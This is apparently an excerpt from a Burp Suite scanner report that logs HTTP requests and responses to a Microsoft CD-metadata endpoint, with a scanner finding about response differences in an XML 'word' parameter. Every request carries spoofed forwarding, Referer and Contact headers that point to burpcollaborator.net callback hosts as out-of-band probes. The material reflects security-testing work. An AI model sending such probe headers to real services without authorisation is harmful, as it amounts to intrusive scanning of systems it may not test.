Referer: http://58beyed2vep7xne7dxaj0bjuvl1cuhv5k.burpcollaborator.net/ref
X-Real-IP: spoofed.xst6i6xuf69zhfyzxpubk33mfdl4e9gx5.burpcollaborator.net
Forwarded: for=spoofed.gqapgpvddp7ifywiv8suim15dwjncsfg4.burpcollaborator.net;by=spoofed.gqapgpvddp7ifywiv8suim15dwjncsfg4.burpcollaborator.net;host=spoofed.gqapgpvddp7ifywiv8suim15dwjncsfg4.burpcollaborator.net
X-Forwarded-For: spoofed.lxmunu2ikuenm33n2dzzpr8ak1qsjxnlc.burpcollaborator.net
Contact: root@f9pozoecwoqhyxfhe7bt1lk4wv2mvr0fp.burpcollaborator.net
From: root@6qxfgfv3df78fow8vyskic1vdmjdd33rs.burpcollaborator.net
True-Client-IP: spoofed.havq0qfexqrjzzgjf9cv2nl6xx3oxeo2d.burpcollaborator.net
X-Wap-Profile: http://xbc616guy6sz0fhzgpdb33mmyd44yuqif.burpcollaborator.net/wap.xml
Client-ip: spoofed.3imc8cn05cz57lo5nvkha9ts5jba50zoo.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>27054536-05BB-44BB-90B8-978ADD3124EB</mdqRequestID>
<album>
<title>
<text>Middle of Nowhere</text>
<word>Middle</word>
<word>of</word>
<word>Nowhere</word>
</title>
<artist>
<text>Hanson</text>
<word>Hanson</word>
</artist>
</album>
<track>
<title>
<text>MMMBop</text>
<word>zndefined</word>
</title>
<artist>
<text>Hanson</text>
<word>Hanson</word>
</artist>
<trackNumber>2</trackNumber>
<filename>02 MMMBop.m4a</filename>
<trackDuration>268678</trackDuration>
<bitrate>270264</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 2

Request 3

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=27054536-05BB-44BB-90B8-978ADD3124EB&x3kc7r7i0=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@fdwo3oic0ouh2xjhi7ft5lo40v6m0ct0i.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 1024
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://58beyed2vep7xne7dxaj0bjuvl1cuhv5k.burpcollaborator.net/ref
X-Real-IP: spoofed.xst6i6xuf69zhfyzxpubk33mfdl4e9gx5.burpcollaborator.net
Forwarded: for=spoofed.gqapgpvddp7ifywiv8suim15dwjncsfg4.burpcollaborator.net;by=spoofed.gqapgpvddp7ifywiv8suim15dwjncsfg4.burpcollaborator.net;host=spoofed.gqapgpvddp7ifywiv8suim15dwjncsfg4.burpcollaborator.net
X-Forwarded-For: spoofed.lxmunu2ikuenm33n2dzzpr8ak1qsjxnlc.burpcollaborator.net
Contact: root@f9pozoecwoqhyxfhe7bt1lk4wv2mvr0fp.burpcollaborator.net
From: root@6qxfgfv3df78fow8vyskic1vdmjdd33rs.burpcollaborator.net
True-Client-IP: spoofed.havq0qfexqrjzzgjf9cv2nl6xx3oxeo2d.burpcollaborator.net
X-Wap-Profile: http://xbc616guy6sz0fhzgpdb33mmyd44yuqif.burpcollaborator.net/wap.xml
Client-ip: spoofed.3imc8cn05cz57lo5nvkha9ts5jba50zoo.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>27054536-05BB-44BB-90B8-978ADD3124EB</mdqRequestID>
<album>
<title>
<text>Middle of Nowhere</text>
<word>Middle</word>
<word>of</word>
<word>Nowhere</word>
</title>
<artist>
<text>Hanson</text>
<word>Hanson</word>
</artist>
</album>
<track>
<title>
<text>MMMBop</text>
<word>empty</word>
</title>
<artist>
<text>Hanson</text>
<word>Hanson</word>
</artist>
<trackNumber>2</trackNumber>
<filename>02 MMMBop.m4a</filename>
<trackDuration>268678</trackDuration>
<bitrate>270264</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 3

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 04 Sep 2017 01:20:37 GMT
Connection: close

<METADATA><mdqRequestID>27054536-05BB-44BB-90B8-978ADD3124EB</mdqRequestID><ResponseCode>Album Mode</ResponseCode><ResponseCode>Unique Album/Performer Match</ResponseCode><MDR-CD><version>5.0</version><mdqRequestID>27054536-05BB-44BB-90B8-978ADD3124EB</mdqRequestID><WMCollectionID>49b1ba54-3743-4383-9f9b-ae354c383b9c</WMCollectionID><WMCollectionGroupID>49b1ba54-3743-4383-9f9b-ae354c383b9c</WMCollectionGroupID><uniqueFileID>AMGa_id=R 276221</uniqueFileID><albumTitle>Middle of Nowhere</albumTitle><albumArtist>Hanson</albumArtist><releaseDate>1997-05-05</releaseDate><label>Mercury</label><genre>Pop</genre><providerStyle>Pop/Rock</providerStyle><publisherRating>7</publisherRating><buyParams>providerName=AMG&albumID=49B1BA54-3743-4383-9F9B-AE354C383B9C&a_id=R%20%20%20276221&album=Middle%20of%20Nowhere&artistID=483BEC3D-4070-4EE9-A151-967A8E3E8E18&p_id=P%20%20%20207164&artist=Hanson</buyParams><largeCoverParams>200/drS600/S605/S60570V01J5.jpg</largeCoverParams><smallCoverParams>075/drS600/S605/S60570V01J5.jpg</smallCoverParams><moreInfoParams>a_id=R%20%20%20276221</moreInfoParams><dataProvider>AMG</dataProvider><dataProviderParams>Provider=AMG</dataProviderParams><dataProviderLogo>Provider=AMG</dataProviderLogo><needIDs>0</needIDs><track><WMContentID>e9cbd5ac-9700-4b6b-9025-5774308ca048</WMContentID><trackRequestID></trackRequestID><trackTitle>Thinking of You</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769557</uniqueFileID><trackNumber>1</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>4d43e458-fc16-4525-bc2f-f017971a46eb</WMContentID><trackRequestID>0</trackRequestID><trackTitle>Mmmbop</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769512</uniqueFileID><trackNumber>2</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>180e5474-a0c6-48a8-91b8-090fdf4a51c6</WMContentID><trackRequestID></trackRequestID><trackTitle>Weird</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769542</uniqueFileID><trackNumber>3</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>fa3fa53b-822d-4e27-bcac-39ff7f47d8cc</WMContentID><trackRequestID></trackRequestID><trackTitle>Speechless</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769656</uniqueFileID><trackNumber>4</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>bb897feb-4057-450a-91b7-9e783a9d77e5</WMContentID><trackRequestID></trackRequestID><trackTitle>Where's the Love</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769374</uniqueFileID><trackNumber>5</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>e2151e1a-f019-4359-97f6-24c6d3a6107f</WMContentID><trackRequestID></trackRequestID><trackTitle>Yearbook</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769776</uniqueFileID><trackNumber>6</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>8575b3b2-6340-4829-8575-e7ba81ecfa52</WMContentID><trackRequestID></trackRequestID><trackTitle>Look at You</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769853</uniqueFileID><trackNumber>7</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>0d7c4f74-c815-45e0-ad88-f653cda3c2ad</WMContentID><trackRequestID></trackRequestID><trackTitle>Lucy</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769757</uniqueFileID><trackNumber>8</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>c47d32b0-3c8f-4216-b3ea-58d69ef9b7ed</WMContentID><trackRequestID></trackRequestID><trackTitle>I Will Come to You</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769905</uniqueFileID><trackNumber>9</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>01c6316e-af7c-4da5-a6f7-ac710f508d66</WMContentID><trackRequestID></trackRequestID><trackTitle>A Minute Without You</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769690</uniqueFileID><trackNumber>10</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>c761e294-5501-4952-a1c9-a63eba6e65d3</WMContentID><trackRequestID></trackRequestID><trackTitle>Madeline</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769403</uniqueFileID><trackNumber>11</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>6d032d84-6fde-42eb-a489-61fb417b023e</WMContentID><trackRequestID></trackRequestID><trackTitle>With You in Your Dreams</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26768947</uniqueFileID><trackNumber>12</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>4aeec08f-94be-4917-b20c-0d8633bcd3f5</WMContentID><trackRequestID></trackRequestID><trackTitle>[Silence]</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26768890</uniqueFileID><trackNumber>13</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>bd43e1dc-ccef-495d-9fc7-852bfea4d5f3</WMContentID><trackRequestID></trackRequestID><trackTitle>[Silence]</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769490</uniqueFileID><trackNumber>14</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>9ecc8b0a-5139-4902-a4da-45ef42f79377</WMContentID><trackRequestID></trackRequestID><trackTitle>[Silence]</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769661</uniqueFileID><trackNumber>15</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>9dffd777-0bf8-46b0-a767-3bd21b7d83e9</WMContentID><trackRequestID></trackRequestID><trackTitle>[Silence]</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769483</uniqueFileID><trackNumber>16</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>a5a143f5-d264-4546-b4ae-f7887c8ac06f</WMContentID><trackRequestID></trackRequestID><trackTitle>[Silence]</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769822</uniqueFileID><trackNumber>17</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>669b543f-2e63-4c82-a7e5-76166aa484e5</WMContentID><trackRequestID></trackRequestID><trackTitle>[Silence]</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769934</uniqueFileID><trackNumber>18</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>101f1760-bd69-409c-9862-6e861ff76ae4</WMContentID><trackRequestID></trackRequestID><trackTitle>[Silence]</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769309</uniqueFileID><trackNumber>19</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>7f713e44-5b23-491a-9a38-ec812738a0a6</WMContentID><trackRequestID></trackRequestID><trackTitle>[Silence]</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26769658</uniqueFileID><trackNumber>20</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>51e334bc-7868-4a77-ac04-070c1f68c1ab</WMContentID><trackRequestID></trackRequestID><trackTitle>Man From Milwaukee [*][Garage Mix]</trackTitle><uniqueFileID>AMGp_id=P 207164;AMGt_id=T 26768888</uniqueFileID><trackNumber>21</trackNumber><trackPerformer>Hanson</trackPerformer><trackComposer></trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track></MDR-CD><Backoff><Time>15</Time></Backoff><L2Threshold>0.14</L2Threshold></METADATA>

Request 4

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=27054536-05BB-44BB-90B8-978ADD3124EB&qmx5hem92=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@fdwo3oic0ouh2xjhi7ft5lo40v6m0ct0i.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 1024
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://58beyed2vep7xne7dxaj0bjuvl1cuhv5k.burpcollaborator.net/ref
X-Real-IP: spoofed.xst6i6xuf69zhfyzxpubk33mfdl4e9gx5.burpcollaborator.net
Forwarded: for=spoofed.gqapgpvddp7ifywiv8suim15dwjncsfg4.burpcollaborator.net;by=spoofed.gqapgpvddp7ifywiv8suim15dwjncsfg4.burpcollaborator.net;host=spoofed.gqapgpvddp7ifywiv8suim15dwjncsfg4.burpcollaborator.net
X-Forwarded-For: spoofed.lxmunu2ikuenm33n2dzzpr8ak1qsjxnlc.burpcollaborator.net
Contact: root@f9pozoecwoqhyxfhe7bt1lk4wv2mvr0fp.burpcollaborator.net
From: root@6qxfgfv3df78fow8vyskic1vdmjdd33rs.burpcollaborator.net
True-Client-IP: spoofed.havq0qfexqrjzzgjf9cv2nl6xx3oxeo2d.burpcollaborator.net
X-Wap-Profile: http://xbc616guy6sz0fhzgpdb33mmyd44yuqif.burpcollaborator.net/wap.xml
Client-ip: spoofed.3imc8cn05cz57lo5nvkha9ts5jba50zoo.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>27054536-05BB-44BB-90B8-978ADD3124EB</mdqRequestID>
<album>
<title>
<text>Middle of Nowhere</text>
<word>Middle</word>
<word>of</word>
<word>Nowhere</word>
</title>
<artist>
<text>Hanson</text>
<word>Hanson</word>
</artist>
</album>
<track>
<title>
<text>MMMBop</text>
<word>zmpty</word>
</title>
<artist>
<text>Hanson</text>
<word>Hanson</word>
</artist>
<trackNumber>2</trackNumber>
<filename>02 MMMBop.m4a</filename>
<trackDuration>268678</trackDuration>
<bitrate>270264</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 4

5.7. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [word XML parameter]
Previous Next

Summary

	Severity:	Medium
	Confidence:	Firm
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/getmdrcd.aspx

Note: This issue was generated by the Burp extension: Backslash Powered Scanner.

Issue detail

Magic value: undefined	undefined	uzdefined
word_count	140	3
whole_body_content	X	Y
content_length	7140	227
limited_body_content	X	Y

Magic value: empty	empty	ezpty
word_count	140	3
whole_body_content	X	Y
content_length	7140	227
limited_body_content	X	Y

Remediation detail

Request 1

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=1F6E8EAC-AD4E-4151-A8A4-183CC7FE0377&gu43hm0=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@1ika8any5az37jo3ntkfa7tq5hbm8nwc.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 1119
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://wkk5a5pt751y9eqypomac2vl7cdhaayz.burpcollaborator.net/ref
X-Real-IP: spoofed.izlrpr4fmrgko05k4a1wroa7mys3pxdm.burpcollaborator.net
Forwarded: for=spoofed.tqn2g2vqd27vfbwvvls7iz1id9jeg94y.burpcollaborator.net;by=spoofed.tqn2g2vqd27vfbwvvls7iz1id9jeg94y.burpcollaborator.net;host=spoofed.tqn2g2vqd27vfbwvvls7iz1id9jeg94y.burpcollaborator.net
X-Forwarded-For: spoofed.u503v3ars3mwucbwam78x0gjsayfvbj0.burpcollaborator.net
Contact: root@ii4r8rnf5rzk70oknakwaot75yb380wp.burpcollaborator.net
From: root@q7yzxzcnuzosw8dsci94zwifu60bx9ly.burpcollaborator.net
True-Client-IP: spoofed.ujh393or630w8cpwoml8b0uj6acf9ex3.burpcollaborator.net
X-Wap-Profile: http://qlfzbzqn8z2sa8rsqin4dwwf86ebbbz0.burpcollaborator.net/wap.xml
Client-ip: spoofed.uwu3m31rj3dwlc2w1my8o07jjapfmha6.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>1F6E8EAC-AD4E-4151-A8A4-183CC7FE0377</mdqRequestID>
<album>
<title>
<text>American Idiot</text>
<word>American</word>
<word>Idiot</word>
</title>
<artist>
<text>Green Day</text>
<word>Green</word>
<word>Day</word>
</artist>
</album>
<track>
<title>
<text>American Idiot</text>
<word>American</word>
<word>undefined</word>
</title>
<artist>
<text>Green Day</text>
<word>Green</word>
<word>Day</word>
</artist>
<trackNumber>1</trackNumber>
<filename>01 American Idiot.m4a</filename>
<trackDuration>176401</trackDuration>
<bitrate>304736</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 04 Sep 2017 01:20:45 GMT
Connection: close

<METADATA><mdqRequestID>1F6E8EAC-AD4E-4151-A8A4-183CC7FE0377</mdqRequestID><ResponseCode>Album Mode</ResponseCode><ResponseCode>Unique Album/Performer Match</ResponseCode><MDR-CD><version>5.0</version><mdqRequestID>1F6E8EAC-AD4E-4151-A8A4-183CC7FE0377</mdqRequestID><WMCollectionID>dee2f966-6f11-4eb9-8fe2-385a92b24890</WMCollectionID><WMCollectionGroupID>dee2f966-6f11-4eb9-8fe2-385a92b24890</WMCollectionGroupID><uniqueFileID>AMGa_id=R 702202</uniqueFileID><albumTitle>American Idiot</albumTitle><albumArtist>Green Day</albumArtist><releaseDate>2004-09-21</releaseDate><label>Reprise</label><genre>Alternative</genre><providerStyle>Pop/Rock</providerStyle><publisherRating>8</publisherRating><buyParams>providerName=AMG&albumID=DEE2F966-6F11-4EB9-8FE2-385A92B24890&a_id=R%20%20%20702202&album=American%20Idiot&artistID=77CF78F7-E149-4FE5-8041-B00019CDA3A3&p_id=P%20%20%20%2069310&artist=Green%20Day</buyParams><largeCoverParams>200/drR500/R539/R53954GKYBC.jpg</largeCoverParams><smallCoverParams>075/drR500/R539/R53954GKYBC.jpg</smallCoverParams><moreInfoParams>a_id=R%20%20%20702202</moreInfoParams><dataProvider>AMG</dataProvider><dataProviderParams>Provider=AMG</dataProviderParams><dataProviderLogo>Provider=AMG</dataProviderLogo><needIDs>0</needIDs><track><WMContentID>c3d13891-e71e-4cff-bf30-47dced919956</WMContentID><trackRequestID>0</trackRequestID><trackTitle>American Idiot</trackTitle><uniqueFileID>AMGp_id=P 69310;AMGt_id=T 7238555</uniqueFileID><trackNumber>1</trackNumber><trackPerformer>Green Day</trackPerformer><trackComposer>Billie Joe Armstrong; Green Day</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>1</explicitLyrics></track><track><WMContentID>7e0d49a4-c261-4d38-802d-19e611ae802c</WMContentID><trackRequestID></trackRequestID><trackTitle>Jesus of Suburbia: Jesus of Suburbia/City of the Damned/I Don't Care</trackTitle><uniqueFileID>AMGp_id=P 69310;AMGt_id=T 7238556</uniqueFileID><trackNumber>2</trackNumber><trackPerformer>Green Day</trackPerformer><trackComposer>Billie Joe Armstrong; Green Day</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>1</explicitLyrics></track><track><WMContentID>4e84969a-054e-4068-8a25-863636d8eb27</WMContentID><trackRequestID></trackRequestID><trackTitle>Holiday</trackTitle><uniqueFileID>AMGp_id=P 69310;AMGt_id=T 7238557</uniqueFileID><trackNumber>3</trackNumber><trackPerformer>Green Day</trackPerformer><trackComposer>Billie Joe Armstrong; Green Day</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>1</explicitLyrics></track><track><WMContentID>fffd5b67-b0d7-4b2c-83f7-2e3f52e2182a</WMContentID><trackRequestID></trackRequestID><trackTitle>Boulevard of Broken Dreams</trackTitle><uniqueFileID>AMGp_id=P 69310;AMGt_id=T 7238558</uniqueFileID><trackNumber>4</trackNumber><trackPerformer>Green Day</trackPerformer><trackComposer>Billie Joe Armstrong; Green Day</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>1</explicitLyrics></track><track><WMContentID>f6d6d82b-6f50-433a-8e87-c3033ad6310d</WMContentID><trackRequestID></trackRequestID><trackTitle>Are We the Waiting</trackTitle><uniqueFileID>AMGp_id=P 69310;AMGt_id=T 7238559</uniqueFileID><trackNumber>5</trackNumber><trackPerformer>Green Day</trackPerformer><trackComposer>Billie Joe Armstrong; Green Day</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>1</explicitLyrics></track><track><WMContentID>77b792a0-864d-4bec-8b62-3d679106a6bf</WMContentID><trackRequestID></trackRequestID><trackTitle>St. Jimmy</trackTitle><uniqueFileID>AMGp_id=P 69310;AMGt_id=T 7238560</uniqueFileID><trackNumber>6</trackNumber><trackPerformer>Green Day</trackPerformer><trackComposer>Billie Joe Armstrong; Green Day</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>1</explicitLyrics></track><track><WMContentID>4197b639-df2d-41d1-997a-d275e8c21375</WMContentID><trackRequestID></trackRequestID><trackTitle>Give Me Novacaine</trackTitle><uniqueFileID>AMGp_id=P 69310;AMGt_id=T 7238561</uniqueFileID><trackNumber>7</trackNumber><trackPerformer>Green Day</trackPerformer><trackComposer>Billie Joe Armstrong; Green Day</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>1</explicitLyrics></track><track><WMContentID>4f0309d6-6f83-4a28-87e6-be252d15092a</WMContentID><trackRequestID></trackRequestID><trackTitle>She's a Rebel</trackTitle><uniqueFileID>AMGp_id=P 69310;AMGt_id=T 7238562</uniqueFileID><trackNumber>8</trackNumber><trackPerformer>Green Day</trackPerformer><trackComposer>Billie Joe Armstrong; Green Day</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>1</explicitLyrics></track><track><WMContentID>d9760ace-f113-4ee4-89a3-88461b09cd5f</WMContentID><trackRequestID></trackRequestID><trackTitle>Extraordinary Girl</trackTitle><uniqueFileID>AMGp_id=P 69310;AMGt_id=T 7238563</uniqueFileID><trackNumber>9</trackNumber><trackPerformer>Green Day</trackPerformer><trackComposer>Billie Joe Armstrong; Green Day</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>1</explicitLyrics></track><track><WMContentID>b65da04f-3c34-4ee4-84f6-75bff2b29942</WMContentID><trackRequestID></trackRequestID><trackTitle>Letter Bomb</trackTitle><uniqueFileID>AMGp_id=P 69310;AMGt_id=T 7238564</uniqueFileID><trackNumber>10</trackNumber><trackPerformer>Green Day</trackPerformer><trackComposer>Billie Joe Armstrong; Green Day</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>1</explicitLyrics></track><track><WMContentID>96b2c2f9-342a-4570-ae98-2adde76d72e2</WMContentID><trackRequestID></trackRequestID><trackTitle>Wake Me Up When September Ends</trackTitle><uniqueFileID>AMGp_id=P 69310;AMGt_id=T 7238565</uniqueFileID><trackNumber>11</trackNumber><trackPerformer>Green Day</trackPerformer><trackComposer>Billie Joe Armstrong; Green Day</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>1</explicitLyrics></track><track><WMContentID>4c806f03-7e66-4d26-9ece-32e5c3bf9621</WMContentID><trackRequestID></trackRequestID><trackTitle>Homecoming: The Death of St. Jimmy/East 12th St./Nobody Likes You/Rock</trackTitle><uniqueFileID>AMGp_id=P 69310;AMGt_id=T 7238566</uniqueFileID><trackNumber>12</trackNumber><trackPerformer>Green Day</trackPerformer><trackComposer>Billie Joe Armstrong; Green Day; Mike Dirnt; Tre Cool</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>1</explicitLyrics></track><track><WMContentID>3836226d-e7da-46da-ba22-636247812c95</WMContentID><trackRequestID></trackRequestID><trackTitle>Whatsername</trackTitle><uniqueFileID>AMGp_id=P 69310;AMGt_id=T 7238567</uniqueFileID><trackNumber>13</trackNumber><trackPerformer>Green Day</trackPerformer><trackComposer>Billie Joe Armstrong; Green Day</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>1</explicitLyrics></track></MDR-CD><Backoff><Time>15</Time></Backoff><L2Threshold>0.14</L2Threshold></METADATA>

Request 2

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=1F6E8EAC-AD4E-4151-A8A4-183CC7FE0377&iygjp3=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@1ika8any5az37jo3ntkfa7tq5hbm8nwc.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 1119
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://wkk5a5pt751y9eqypomac2vl7cdhaayz.burpcollaborator.net/ref
X-Real-IP: spoofed.izlrpr4fmrgko05k4a1wroa7mys3pxdm.burpcollaborator.net
Forwarded: for=spoofed.tqn2g2vqd27vfbwvvls7iz1id9jeg94y.burpcollaborator.net;by=spoofed.tqn2g2vqd27vfbwvvls7iz1id9jeg94y.burpcollaborator.net;host=spoofed.tqn2g2vqd27vfbwvvls7iz1id9jeg94y.burpcollaborator.net
X-Forwarded-For: spoofed.u503v3ars3mwucbwam78x0gjsayfvbj0.burpcollaborator.net
Contact: root@ii4r8rnf5rzk70oknakwaot75yb380wp.burpcollaborator.net
From: root@q7yzxzcnuzosw8dsci94zwifu60bx9ly.burpcollaborator.net
True-Client-IP: spoofed.ujh393or630w8cpwoml8b0uj6acf9ex3.burpcollaborator.net
X-Wap-Profile: http://qlfzbzqn8z2sa8rsqin4dwwf86ebbbz0.burpcollaborator.net/wap.xml
Client-ip: spoofed.uwu3m31rj3dwlc2w1my8o07jjapfmha6.burpcollaborator.net

<METADATA>
<MDQ-CD>
